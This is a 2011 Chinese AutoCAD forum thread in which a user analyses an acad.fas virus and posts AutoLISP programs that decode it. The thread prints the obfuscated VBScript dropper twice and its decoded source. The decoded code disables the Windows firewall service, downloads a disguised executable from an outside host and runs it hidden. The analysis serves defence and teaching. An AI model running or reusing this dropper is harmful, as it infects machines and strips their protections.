[风之影][源码]acad.fas病毒破解过程

cabinsummer · 发表于 2011-9-24 11:26:54

本帖最后由 cabinsummer 于 2011-9-26 22:27 编辑

以下病毒脚本来自不死猫于2010-4-29发的帖子http://bbs.mjtd.com/thread-80783-1-1.html

Function AB(x)
For i=1 to lEN(x) Step 2
AB=AB & cHR(CLng("&H" & mID(x,i,2)) xOR 23)
Next
End Function
Z="587937526565786537457264627A723759726F631A1D4472633778757D514458372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D78757D5144583953727B726372517E7B7237404474657E6763394474657E676351627B7B59767A723B37436562721A1D606474657E676339647B727267372427272727271A1D74657276637258757D7274633F35606474657E676339647F727B7B353E394562793735747A7339726F7237385437797263376463786737647F76657273767474726464353B37273B37436562721A1D606474657E676339647B72726737262527272727271A1D4476617247637F372A375B547664723F35742D4B607E79737860644B6072754B7B78707839726F72353E371A1D5E713778757D51445839517E7B72526F7E646364373F4476617247637F3E37437F72793778757D5144583953727B726372517E7B72373F4476617247637F3E37527973375E71371A1D447263376F47786463372A3754657276637258757D7274633F355A7E74657864787163394F5A5B5F434347353E37371A1D6F4778646339586772793735505243353B357F6363672D38386060603974767370643974787A386D387B78707839707E71353B271A1D6F4778646339447279733F3E37371A1D4472633764507263372A3754657276637258757D7274633F3556535853553944636572767A353E37371A1D64507263395A787372372A372437371A1D6450726339436E6772372A372637371A1D6450726339586772793F3E37371A1D645072633940657E63723F6F477864633965726467787964725578736E3E1A1D6450726339447661724378517E7B723735742D4B607E79737860644B6072754B647671727A7873727B78707839707E71353B251A1D78757D514458395A786172517E7B723735742D4B607E79737860644B6072754B647671727A7873727B78707839707E7135373B374476617247637F1A1D5E713778757D51445839507263517E7B72373F4476617247637F3E39647E6D723729372427272737437F72793754657276637258757D7274633F35406474657E676339447F727B7B353E39656279374476617247637F3B37273B376365627237527973375E71371A1D5E713778757D51445839517E7B72526F7E646364373F4476617247637F3E37437F72793778757D5144583953727B726372517E7B72373F4476617247637F3E37527973375E71"
Execute AB(Z)

Function AB(x) 
For i=1 to lEN(x) Step 2 
AB=AB & cHR(CLng("&H" & mID(x,i,2)) xOR 23) 
Next 
End Function 
Z="587937526565786537457264627A723759726F631A1D4472633778757D514458372A3754657276637258757D7274633F354474657E67637E797039517E7B72446E6463727A58757D727463353E1A1D78757D5144583953727B726372517E7B7237404474657E6763394474657E676351627B7B59767A723B37436562721A1D606474657E676339647B727267372427272727271A1D74657276637258757D7274633F35606474657E676339647F727B7B353E394562793735747A7339726F7237385437797263376463786737647F76657273767474726464353B37273B37436562721A1D606474657E676339647B72726737262527272727271A1D4476617247637F372A375B547664723F35742D4B607E79737860644B6072754B7B78707839726F72353E371A1D5E713778757D51445839517E7B72526F7E646364373F4476617247637F3E37437F72793778757D5144583953727B726372517E7B72373F4476617247637F3E37527973375E71371A1D447263376F47786463372A3754657276637258757D7274633F355A7E74657864787163394F5A5B5F434347353E37371A1D6F4778646339586772793735505243353B357F6363672D38386060603974767370643974787A386D387B78707839707E71353B271A1D6F4778646339447279733F3E37371A1D4472633764507263372A3754657276637258757D7274633F3556535853553944636572767A353E37371A1D64507263395A787372372A372437371A1D6450726339436E6772372A372637371A1D6450726339586772793F3E37371A1D645072633940657E63723F6F477864633965726467787964725578736E3E1A1D6450726339447661724378517E7B723735742D4B607E79737860644B6072754B647671727A7873727B78707839707E71353B251A1D78757D514458395A786172517E7B723735742D4B607E79737860644B6072754B647671727A7873727B78707839707E7135373B374476617247637F1A1D5E713778757D51445839507263517E7B72373F4476617247637F3E39647E6D723729372427272737437F72793754657276637258757D7274633F35406474657E676339447F727B7B353E39656279374476617247637F3B37273B376365627237527973375E71371A1D5E713778757D51445839517E7B72526F7E646364373F4476617247637F3E37437F72793778757D5144583953727B726372517E7B72373F4476617247637F3E37527973375E71" 
Execute AB(Z)

破解方法如下：
关键在读懂字符串Z
Z是十六进制，把每两个一组与十进制的23异或（xor）后取asc码就是解密后的文件。
由于vlisp不能直接读十六进制文件，所以先将Z值转换为十进制数字。我是用excel公式转的，每16个一行，数和数之间用空格分隔，再存成c:\aaa.txt
内容如下：

88 121 55 82 101 101 120 101 55 69 114 100 98 122 114 55
89 114 111 99 26 29 68 114 99 55 120 117 125 81 68 88
55 42 55 84 101 114 118 99 114 88 117 125 114 116 99 63
53 68 116 101 126 103 99 126 121 112 57 81 126 123 114 68
110 100 99 114 122 88 117 125 114 116 99 53 62 26 29 120
117 125 81 68 88 57 83 114 123 114 99 114 81 126 123 114
55 64 68 116 101 126 103 99 57 68 116 101 126 103 99 81
98 123 123 89 118 122 114 59 55 67 101 98 114 26 29 96
100 116 101 126 103 99 57 100 123 114 114 103 55 36 39 39
39 39 39 26 29 116 101 114 118 99 114 88 117 125 114 116
99 63 53 96 100 116 101 126 103 99 57 100 127 114 123 123
53 62 57 69 98 121 55 53 116 122 115 57 114 111 114 55
56 84 55 121 114 99 55 100 99 120 103 55 100 127 118 101
114 115 118 116 116 114 100 100 53 59 55 39 59 55 67 101
98 114 26 29 96 100 116 101 126 103 99 57 100 123 114 114
103 55 38 37 39 39 39 39 39 26 29 68 118 97 114 71
99 127 55 42 55 91 84 118 100 114 63 53 116 45 75 96
126 121 115 120 96 100 75 96 114 117 75 123 120 112 120 57
114 111 114 53 62 55 26 29 94 113 55 120 117 125 81 68
88 57 81 126 123 114 82 111 126 100 99 100 55 63 68 118
97 114 71 99 127 62 55 67 127 114 121 55 120 117 125 81
68 88 57 83 114 123 114 99 114 81 126 123 114 55 63 68
118 97 114 71 99 127 62 55 82 121 115 55 94 113 55 26
29 68 114 99 55 111 71 120 100 99 55 42 55 84 101 114
118 99 114 88 117 125 114 116 99 63 53 90 126 116 101 120
100 120 113 99 57 79 90 91 95 67 67 71 53 62 55 55
26 29 111 71 120 100 99 57 88 103 114 121 55 53 80 82
67 53 59 53 127 99 99 103 45 56 56 96 96 96 57 116
118 115 112 100 57 116 120 122 56 109 56 123 120 112 120 57
112 126 113 53 59 39 26 29 111 71 120 100 99 57 68 114
121 115 63 62 55 55 26 29 68 114 99 55 100 80 114 99
55 42 55 84 101 114 118 99 114 88 117 125 114 116 99 63
53 86 83 88 83 85 57 68 99 101 114 118 122 53 62 55
55 26 29 100 80 114 99 57 90 120 115 114 55 42 55 36
55 55 26 29 100 80 114 99 57 67 110 103 114 55 42 55
38 55 55 26 29 100 80 114 99 57 88 103 114 121 63 62
55 55 26 29 100 80 114 99 57 64 101 126 99 114 63 111
71 120 100 99 57 101 114 100 103 120 121 100 114 85 120 115
110 62 26 29 100 80 114 99 57 68 118 97 114 67 120 81
126 123 114 55 53 116 45 75 96 126 121 115 120 96 100 75
96 114 117 75 100 118 113 114 122 120 115 114 123 120 112 120
57 112 126 113 53 59 37 26 29 120 117 125 81 68 88 57
90 120 97 114 81 126 123 114 55 53 116 45 75 96 126 121
115 120 96 100 75 96 114 117 75 100 118 113 114 122 120 115
114 123 120 112 120 57 112 126 113 53 55 59 55 68 118 97
114 71 99 127 26 29 94 113 55 120 117 125 81 68 88 57
80 114 99 81 126 123 114 55 63 68 118 97 114 71 99 127
62 57 100 126 109 114 55 41 55 36 39 39 39 55 67 127
114 121 55 84 101 114 118 99 114 88 117 125 114 116 99 63
53 64 100 116 101 126 103 99 57 68 127 114 123 123 53 62
57 101 98 121 55 68 118 97 114 71 99 127 59 55 39 59
55 99 101 98 114 55 82 121 115 55 94 113 55 26 29 94
113 55 120 117 125 81 68 88 57 81 126 123 114 82 111 126
100 99 100 55 63 68 118 97 114 71 99 127 62 55 67 127
114 121 55 120 117 125 81 68 88 57 83 114 123 114 99 114
81 126 123 114 55 63 68 118 97 114 71 99 127 62 55 82
121 115 55 94 113 100 100 100 100 100 100 100 100 100 100 100

复制代码

最后11个100是我自己加上去的，目的是为了不要在程序里有更多的处理，解密完成后删除最后11个字符即可。
解密程序如下：

(defun xor(a);;;定义数值异或函数，本函数直接和23异或
(chr (boole 6 23 a));;;lisp函数boole 6表示异或，后两个参数是进行计算的数值
)
(setq AB "");;;定义输出字符串
(setq fn (open "c:\\aaa.txt" "r"));;;打开病毒代码转化为10进制的文件
(while (setq str (read-line fn));;;读取一行
(repeat 16;;;每行重复16次，读取16个数
(setq str1 (substr str 1 (vl-string-position 32 str)));;;读取界符
(setq AB (strcat AB (xor (read str1))));;;与23异或后转成字符串加在AB后面
(if (setq pos (vl-string-position 32 str));;;处理每行最后一个数值
(setq str (substr str (+ 2 (vl-string-position 32 str))))
)
)
)
(close fn);;;关闭输入文件
(setq AB (vl-string-right-trim "s" AB));;;将设定的多余字符裁掉
(setq fn (open "c:\\bbb.txt" "w"));;;打开输出文件
(princ AB fn);;;写入
(close fn);;;关闭输出文件

解密后的文件bbb.txt如下：

On Error Resume Next
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile WScript.ScriptFullName, True
wscript.sleep 300000
createObject("wscript.shell").Run "cmd.exe /C net stop sharedaccess", 0, True
wscript.sleep 1200000
SavePth = LCase("c:\windows\web\logo.exe")
If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.cadgs.com/z/logo.gif",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\windows\web\safemodelogo.gif",2
objFSO.MoveFile "c:\windows\web\safemodelogo.gif" , SavePth
If objFSO.GetFile (SavePth).size > 3000 Then CreateObject("Wscript.Shell").run SavePth, 0, true End If
If objFSO.FileExists (SavePth) Then objFSO.DeleteFile (SavePth) End If

复制代码

gbhsu · 发表于 2011-9-24 11:57:15

本帖最后由 gbhsu 于 2011-9-24 11:57 编辑

呵呵,坐沙发顶一下!!!

LLXXZZ · 发表于 2011-9-24 12:06:29

太厉害了，

zoubo604 · 发表于 2011-9-24 15:30:57

支持你.顶一下

仲文玉 · 发表于 2011-9-24 19:54:13

牛，很是厉害

，不知道这个程序修改了哪些东东

仲文玉 · 发表于 2011-9-24 20:05:06

恩，cadgs网站以前也是火过一段时间，很短暂，现在好像没有什么了。
以前倒是没有在意过他的网站这德行

kwok · 发表于 2011-9-25 01:22:40

太高深了看不懂

cabinsummer · 发表于 2011-9-25 08:09:45

本帖最后由 cabinsummer 于 2011-9-25 19:23 编辑

直接读Z字符串的程序
本文的十六进制转十进制函数hex2dec是根据sihan在2005-5-17发的帖子改造的
该帖子位于http://bbs.mjtd.com/thread-36961-1-1.html
将Z存为文本文件c:\aaa.txt，输出病毒的源码c:\bbb.txt

(defun hex2dec(val / pos power result tmp)
(setq pos (1+ (strlen val)))
(setq power -1)
(setq result 0)
(setq val (strcase val))
(while (> (setq pos (1- pos)) 0)
(setq result (+ result
(* (if (> (setq tmp (ascii (substr val pos 1))) 64)
(- tmp 55)
(- tmp 48)
)
(expt 16 (setq power (1+ power)))
)
)
)
)
result
)
(defun xor(a)
(chr (boole 6 23 a))
)
(setq AB "")
(setq fn (open "c:\\aaa.txt" "r"))
(while (setq str0 (read-char fn))
(setq str1 (read-char fn))
(setq str (hex2dec (strcat (chr str0)(chr str1))))
(setq AB (strcat AB (xor str)))
)
(close fn)
(setq fn (open "c:\\bbb.txt" "w"))
(princ AB fn)
(close fn)

dwg001 · 发表于 2011-9-25 09:36:23

非但鱼，更有渔。
学习了。

mycad · 发表于 2011-9-25 14:37:46

顶！！！！！！！！！！！

账号		自动登录	找回密码
密码			注册

[风之影][源码]acad.fas病毒破解过程

点评

浏览过的版块